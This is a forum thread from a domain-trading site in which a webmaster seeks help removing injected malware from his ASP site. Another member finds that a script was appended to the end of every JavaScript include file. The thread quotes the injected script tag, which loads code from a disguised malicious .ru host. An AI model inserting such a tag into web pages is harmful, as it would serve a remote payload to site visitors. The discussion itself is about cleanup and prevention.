Buy Sell Discuss UK Domain Names at AcornDomains.co.uk Domain Sponsor

Today's Drop Dates are: 07-11-2011 or 14-11-2011   All times are GMT. The time now is 12:45:26 PM.
Domain Name Sales Domain Software Calculate UK Domain Drop Dates Domain Registration NameDrive Domain Parking Subscribe to our Domains For Sale newsletter
Go Back   Domain Forum Acorn Domains Buy Sell Auction UK Domains > Website Design and Promotion > Website Design > Scripts and Coding
Connect with Facebook

Scripts and Coding PHP, MySQL, scripts

Closed Thread
 
LinkBack Thread Tools Display Modes
Old 10-01-2010, 02:49:57 PM     #1 (permalink)

 
charlie's Avatar
 
Join Date: Jul 2004
Location: No fixed abode
Posts: 2,629
charlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond repute

Malware

Somewhere in my code is a malware script

it basically this
remote data services data control bloodhound virus embedded in webpage : services, remote, control

i've searched high and low for the script within the code without any luck. Using firefox with combined generated source you can see it - index page shows the code at the bottom

<script src="h**p://surfthechannel-com.tribalfusion.com.rakuten-co-jp.worldwebworld.ru:8080/google.com/google.com/yieldmanager.com/girlsgogames.com/it168.com/" id="Y1oh3ud7md" type="text/javascript" defer="defer"></script>

but looking at the 2 frames individually it isnt there

i've run malware and anti virus all over it with out joy. Also full script searches for any of the text within that link - even gone through all the javascript references

any ideas??
charlie is offline  
Old 10-01-2010, 03:01:01 PM     #2 (permalink)

 
davedevelopment's Avatar
 
Join Date: May 2009
Location: Brough, East Yorks
Posts: 988
davedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond repute

Not just from that I'm afraid, the ones I've seen have usually been included by using PHPs base64_decode function, making it harder to spot/find.
__________________
Me: Blog | Company | Twitter

Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk
davedevelopment is online now  
Old 10-01-2010, 03:24:14 PM     #3 (permalink)

 
charlie's Avatar
 
Join Date: Jul 2004
Location: No fixed abode
Posts: 2,629
charlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond repute

asp site so not sure it will be in the PHP?
have being using firebug to step through every parameter but not sure what exactly i'm looking for

well if you can spot it
URL is ******marineband.com
any help appreciated
charlie is offline  
Old 10-01-2010, 03:43:20 PM     #4 (permalink)

 
davedevelopment's Avatar
 
Join Date: May 2009
Location: Brough, East Yorks
Posts: 988
davedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond repute

Check the last line of all your javascript files.

e.g. httpRequest.js, line 99
__________________
Me: Blog | Company | Twitter

Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk
davedevelopment is online now  
Old 10-01-2010, 03:56:56 PM     #5 (permalink)

 
charlie's Avatar
 
Join Date: Jul 2004
Location: No fixed abode
Posts: 2,629
charlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond repute

brilliance!
thanks you saved me - i owe you a beer

dont suppose you can tell me how you found that? save me the turmoil next time.
charlie is offline  
Old 10-01-2010, 04:02:55 PM     #6 (permalink)

 
charlie's Avatar
 
Join Date: Jul 2004
Location: No fixed abode
Posts: 2,629
charlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond repute

in fact the script was in everyone of my js include files - thanks again for putting me on the right track
charlie is offline  
Old 10-01-2010, 04:07:56 PM     #7 (permalink)

 
davedevelopment's Avatar
 
Join Date: May 2009
Location: Brough, East Yorks
Posts: 988
davedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond repute

I just checked your JS for anything suspicious looking!
davedevelopment is online now  
Old 10-01-2010, 04:13:56 PM     #8 (permalink)

 
charlie's Avatar
 
Join Date: Jul 2004
Location: No fixed abode
Posts: 2,629
charlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond repute

bit odd that antivirus and malware missed these
I know that they cant cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day
charlie is offline  
Old 10-01-2010, 04:30:03 PM     #9 (permalink)

 
newguy's Avatar
 
Join Date: Dec 2009
Location: UK
Posts: 1,451
newguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond reputenewguy has a reputation beyond repute

Quote:
Originally Posted by charlie View Post
bit odd that antivirus and malware missed these
I know that they cant cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day
Are you going to make any changes to ensure that this doesn't happen again? Is everything up-to-date? It's possible that they're using some kind of automated software to exploit a weakness.
newguy is offline  
Old 10-01-2010, 10:51:22 PM     #10 (permalink)

 
charlie's Avatar
 
Join Date: Jul 2004
Location: No fixed abode
Posts: 2,629
charlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond reputecharlie has a reputation beyond repute

difficult to spot unless i know exactly how they got in
ftp access to files - means i can only change the password on the ftp, which will only delay them if they are that keen. Not sure what it was set to but i can only imagine thats the way they did it?
charlie is offline  
Closed Thread



Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off

Similar Threads
Thread Thread Starter Domain Name Community Replies Last Post
Help - nasty malware problem crabfoot New Domainers 9 30-11-2009 08:26:44 PM
Targeted Malware Attack on Foreign Correspondents based in China - Information Warfar RSS Domain Name News 0 28-09-2009 07:01:29 AM
Cleansing the Augean (ICANN) Stables of Malware distributors - ComputerWeekly.com RSS Domain Name News 0 17-03-2009 06:59:05 PM
EstDomains, Inc: Global Struggle Against Malware Distribution - Domain informer RSS Domain Name News 0 15-09-2008 01:59:06 PM
EstDomains, Inc: Global Struggle Against Malware Distribution - PR Web (press release RSS Domain Name News 0 14-09-2008 07:59:26 AM

Domain Sponsor 2


All times are GMT. The time now is 12:45:26 PM.


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.6.0 RC 2
All content on Acorn Domains is member generated and is not moderated before posting. All content is viewed and used by you at your own risk and AD does not warrant the accuracy or reliability of any of the information. The views expressed are those of the individual contributors and not necessarily those of AD. Please contact us to report any issues or send a PM to "Admin".